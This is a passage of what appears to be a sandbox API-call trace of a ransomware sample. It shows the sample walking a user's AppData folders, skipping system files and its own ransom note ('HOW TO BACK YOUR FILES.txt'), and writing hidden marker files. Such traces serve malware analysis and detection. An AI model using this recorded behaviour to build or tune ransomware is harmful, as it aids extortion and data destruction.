Flags=0x0, Size=0xc4) returned 0x116c70 [0064.577] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122008 | out: ListHead=0xf68b0, ListEntry=0x122008) returned 0x122228 [0064.577] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x71c949cf, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x71c949cf, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x71c949cf, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0064.577] lstrcmpiW (lpString1="TempState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.577] lstrcmpiW (lpString1="TempState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.577] lstrcmpiW (lpString1="TempState", lpString2="Rabbit4444.exe") returned 1 [0064.577] lstrcmpiW (lpString1="TempState", lpString2=".") returned 1 [0064.577] lstrcmpiW (lpString1="TempState", lpString2="..") returned 1 [0064.577] lstrcmpiW (lpString1="TempState", lpString2="windows") returned -1 [0064.577] lstrcmpiW (lpString1="TempState", lpString2="bootmgr") returned 1 [0064.577] lstrcmpiW (lpString1="TempState", lpString2="pagefile.sys") returned 1 [0064.577] lstrcmpiW (lpString1="TempState", lpString2="boot") returned 1 [0064.577] lstrcmpiW (lpString1="TempState", lpString2="ids.txt") returned 1 [0064.577] lstrcmpiW (lpString1="TempState", lpString2="NTUSER.DAT") returned 1 [0064.577] lstrcpyW (in: lpString1=0x130ebe0, lpString2="TempState" | out: lpString1="TempState") returned="TempState" [0064.577] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122020 [0064.577] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xbc) returned 0x11e240 [0064.577] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122028 | out: ListHead=0xf68b0, ListEntry=0x122028) returned 0x122008 [0064.577] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x71c949cf, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x71c949cf, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x71c949cf, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0064.577] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0064.578] lstrcpyW (in: lpString1=0x130ebe0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.578] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.windowpicker_cw5n1h2txyewy\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.578] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.578] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.578] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.579] CloseHandle (hObject=0x2a0) returned 1 [0064.579] CloseHandle (hObject=0x2cc) returned 1 [0064.579] GetCurrentThreadId () returned 0xd98 [0064.579] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122028 [0064.579] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\TempState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\TempState" [0064.579] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e240 | out: hHeap=0xe0000) returned 1 [0064.579] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122020 | out: hHeap=0xe0000) returned 1 [0064.579] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\TempState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\TempState" [0064.579] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\TempState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\TempState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\TempState\\" [0064.579] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\TempState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3" [0064.579] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.windowpicker_cw5n1h2txyewy\\tempstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.581] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.583] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.601] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.613] CloseHandle (hObject=0x2cc) returned 1 [0064.613] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\TempState") returned 93 [0064.613] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.614] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\TempState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x71c949cf, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x71c949cf, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xefd0823b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0064.614] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.614] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.614] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.614] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.614] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x71c949cf, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x71c949cf, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xefd0823b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.614] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.614] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.614] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.614] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.614] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.614] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefd0823b, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefd0823b, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefd0823b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.614] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.614] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.614] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefd0823b, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefd0823b, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefd0823b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0064.614] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0064.614] lstrcpyW (in: lpString1=0x130ebf4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.614] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\TempState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.windowpicker_cw5n1h2txyewy\\tempstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.615] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.615] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.615] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.615] CloseHandle (hObject=0x2a0) returned 1 [0064.615] CloseHandle (hObject=0x2cc) returned 1 [0064.615] GetCurrentThreadId () returned 0xd98 [0064.615] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122008 [0064.615] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\SystemAppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\SystemAppData" [0064.615] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x116c70 | out: hHeap=0xe0000) returned 1 [0064.616] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122000 | out: hHeap=0xe0000) returned 1 [0064.616] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\SystemAppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\SystemAppData" [0064.616] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\SystemAppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\SystemAppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\SystemAppData\\" [0064.616] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\SystemAppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3" [0064.616] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.windowpicker_cw5n1h2txyewy\\systemappdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.618] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.623] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.624] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.624] CloseHandle (hObject=0x2cc) returned 1 [0064.625] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\SystemAppData") returned 97 [0064.625] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.625] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\SystemAppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x71c949cf, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x71c949cf, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xefd7a8e9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0064.625] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.625] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.625] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.625] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.625] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x71c949cf, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x71c949cf, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xefd7a8e9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.625] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.625] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.625] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.625] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.625] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.625] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefd7a8e9, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefd7a8e9, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefd88d70, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.625] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.625] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.626] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefd7a8e9, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefd7a8e9, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefd88d70, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0064.626] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0064.626] lstrcpyW (in: lpString1=0x130ebfc, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.626] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\SystemAppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.windowpicker_cw5n1h2txyewy\\systemappdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.626] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.627] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.627] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.627] CloseHandle (hObject=0x2a0) returned 1 [0064.627] CloseHandle (hObject=0x2cc) returned 1 [0064.627] GetCurrentThreadId () returned 0xd98 [0064.627] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122228 [0064.627] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\Settings", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\Settings" [0064.627] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e178 | out: hHeap=0xe0000) returned 1 [0064.627] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122220 | out: hHeap=0xe0000) returned 1 [0064.627] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\Settings" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\Settings" [0064.627] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\Settings", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\Settings\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\Settings\\" [0064.627] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\Settings\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3" [0064.628] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.windowpicker_cw5n1h2txyewy\\settings\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.629] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.632] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.666] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.666] CloseHandle (hObject=0x2cc) returned 1 [0064.666] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\Settings") returned 92 [0064.666] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.666] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\Settings\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x71c949cf, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x71c949cf, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xefd964aa, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a10 [0064.667] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.667] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.667] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.667] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.667] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x71c949cf, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x71c949cf, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xefd964aa, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.667] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.667] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.667] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.667] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.667] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.667] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefd964aa, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefd964aa, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefd9ed6b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.667] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.667] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.667] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71c949cf, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x71c949cf, ftLastAccessTime.dwHighDateTime=0x1d32744, 